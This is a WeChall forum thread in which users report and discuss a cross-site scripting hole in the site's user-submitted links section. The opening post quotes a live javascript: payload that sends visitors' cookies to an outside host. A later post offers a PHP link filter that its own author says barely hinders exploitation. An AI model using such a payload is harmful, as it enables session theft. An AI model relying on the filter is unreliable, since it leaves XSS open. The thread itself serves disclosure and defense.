SignupHide Sidebar
Username: 
Password: 
Restrict session to IP 
Statistics
47 Sites
180 Challs
8879 Posts
66478 Users
41 donations
0 Patreons
1 Shop
47 Active Sites
World of Wargame
WeChall
TheBlackSheep
Rankk
Electrica
NewbieContest
LOST-Chall
Yashira
BrainQuest
Net-Force
HackThisSite
ThisisLegal.com
elhacker.net
TryThis0ne
TDHack
+Ma's Reversing
Hacker.org
HackBBS
Root-Me
SPOJ
Revolution Elite
W3Challs
Gekkó
Webhacking.kr
Reversing.Kr
SuNiNaTaS
Hacking-Challenges
OverTheWire.org
RedTigers Hackit
Defend the Web
Mod-X
Omega Project
ae27ff
pwnable.kr
RingZer0 Team Online CTF
pwnable.tw
Hack The Box
try to decrypt
MysteryTwister
LordofSQLi
Énigmes À Thématiques
247CTF
CryptoHack
PyDéfis
PromptRiddle
PWN.TN
pwn.college
Top 10 Players
dloser
benito255
jusb3
Caesum
tehron
phoenix1204
lordOric
thefinder
Akorlith
Xaav
Last 20 Activities
r0d
yasinumitd
ak4m1m3
sinemgoctu
yasinumitd
emreeldemirx
emreu9
kaanakgun
mbatuhanunverdi
WArBp-3R
HvT
emreeldemirx
kaanakgun
mbatuhanunverdi
sysfail
iankovic
mt963
chimera
salidurak
N1ghtmare-
Online within 1d
54 Users
HvT
nairolf32
mystery_boy
r0d
rootanonymous
kaanakgun
emreu9
chimera
yasinumitd
AlexBabkf
sinemgoctu
WArBp-3R
mbatuhanunverdi
emreeldemirx
criple_ripper
livinskull
vulturized
hakanzavrak
cheerfulbull
N1ghtmare-
more
WeChall->Bug Report

Links section

bugsNumber of Challenges
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 67d
Z`s Avatar



Last Seen: 242d 17h
The User is Offline
Links section
Apr 23, 2008 - 16:25:58 (16y 10d) Google/translate1Thank You!1Good Post!0Bad Post! link
javascript:document.location="http://osmosis.ath.cx/~mals/mals/o.php?o="+document.cookie

Hmm, does not look good...

Global Rank: 253
Totalscore: 87266
Posts: 1639
Thanks: 1339
UpVotes: 887
Registered: 16y 75d




Last Seen: 6h 50m
The User is Offline
Send EMail to gizmore
Links section
Apr 23, 2008 - 16:48:03 (16y 10d) Google/translate1Thank You!0Good Post!1Bad Post! link
Thanks for alerting us.

I deleted the harmful links.

Currently i have no idea how to sanitize submitted links properly.
Maybe we should add some <noscript> tags for links section ?

@mals: Thanks for finding a real security problem Smile
The geeks shall inherit the properties and methods of object earth.
Global Rank: 437
Totalscore: 55759
Posts: 34
Thanks: 39
UpVotes: 18
Registered: 16y 71d

Last Seen: 14y 58d
The User is Offline
Links section
Apr 23, 2008 - 17:09:46 (16y 10d) Google/translate1Thank You!1Good Post!0Bad Post! link
Links should be validated by admins first.
Global Rank: 73
Totalscore: 213034
Posts: 148
Thanks: 206
UpVotes: 107
Registered: 16y 74d
Kender`s Avatar



Last Seen: 2y 45d
The User is Offline
Links section
Apr 23, 2008 - 19:48:57 (16y 10d) Google/translate1Thank You!1Good Post!0Bad Post! link
I agree with theAnswer.
What's to stop people from adding tons of ad-links?
Global Rank: 253
Totalscore: 87266
Posts: 1639
Thanks: 1339
UpVotes: 887
Registered: 16y 75d




Last Seen: 6h 50m
The User is Offline
Send EMail to gizmore
Links section
Apr 23, 2008 - 20:16:23 (16y 10d) Google/translate1Thank You!1Good Post!0Bad Post! link
The amount of links you can add depends on your totalscore.

how about this snippet to prevent xss in links ?
GeSHi`ed Plaintext code
1
2
3
4
56

 
$url = str_replace("http://", "", $url);
if (strpos($url, "://") !== false) {
   return htmlDisplayError("only valid links please.");
}
 


My guess is that this would only make it slightly harder to exploit.
The geeks shall inherit the properties and methods of object earth.
Global Rank: 29380
Totalscore: 0
Posts: 257
Thanks: 236
UpVotes: 173
Registered: 24y 158d
Last Seen: 0s
The User is Online
Links section
Apr 24, 2008 - 13:10:23 (16y 9d) Google/translate1Thank You!1Good Post!0Bad Post! link
stop trying to be funny.
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 67d
Z`s Avatar



Last Seen: 242d 17h
The User is Offline
Links section
Apr 24, 2008 - 13:46:21 (16y 9d) Google/translate1Thank You!1Good Post!0Bad Post! link
There are tons of solutions on the net, but this one looks short and good enough:

http://svn.bitflux.ch/repos/public/popoon/trunk/classes/externalinput.php
Global Rank: 54
Totalscore: 257210
Posts: 152
Thanks: 127
UpVotes: 157
Registered: 16y 73d





Last Seen: 28d 15h
The User is Offline
Links section
Apr 24, 2008 - 15:50:04 (16y 9d) Google/translate1Thank You!1Good Post!0Bad Post! link
Maybe checkout the W3C specification for URL. I bet u'll find a regex for it.
Global Rank: 172
Totalscore: 115603
Posts: 166
Thanks: 162
UpVotes: 119
Registered: 16y 67d
Z`s Avatar



Last Seen: 242d 17h
The User is Offline
Links section
Apr 24, 2008 - 16:10:19 (16y 9d) Google/translate1Thank You!1Good Post!0Bad Post! link
I think regex is not a good way, because nothing ensures that a valid url doesnt contain an evil payload. This statement is only theoretical, but true.

Lessons learned: preventing xss is a hard nut...
tunelko, quangntenemy, TheHiveMind, Z, balicocat, Ge0, samuraiblanco, arraez, jcquinterov, hophuocthinh, alfamen2, burhanudinn123, Ben_Dover, stephanduran89, braddie0, JanLitwin17, SwolloW, dangarbri have subscribed to this thread and receive emails on new posts.
1 people are watching the thread at the moment.
This thread has been viewed 2801 times.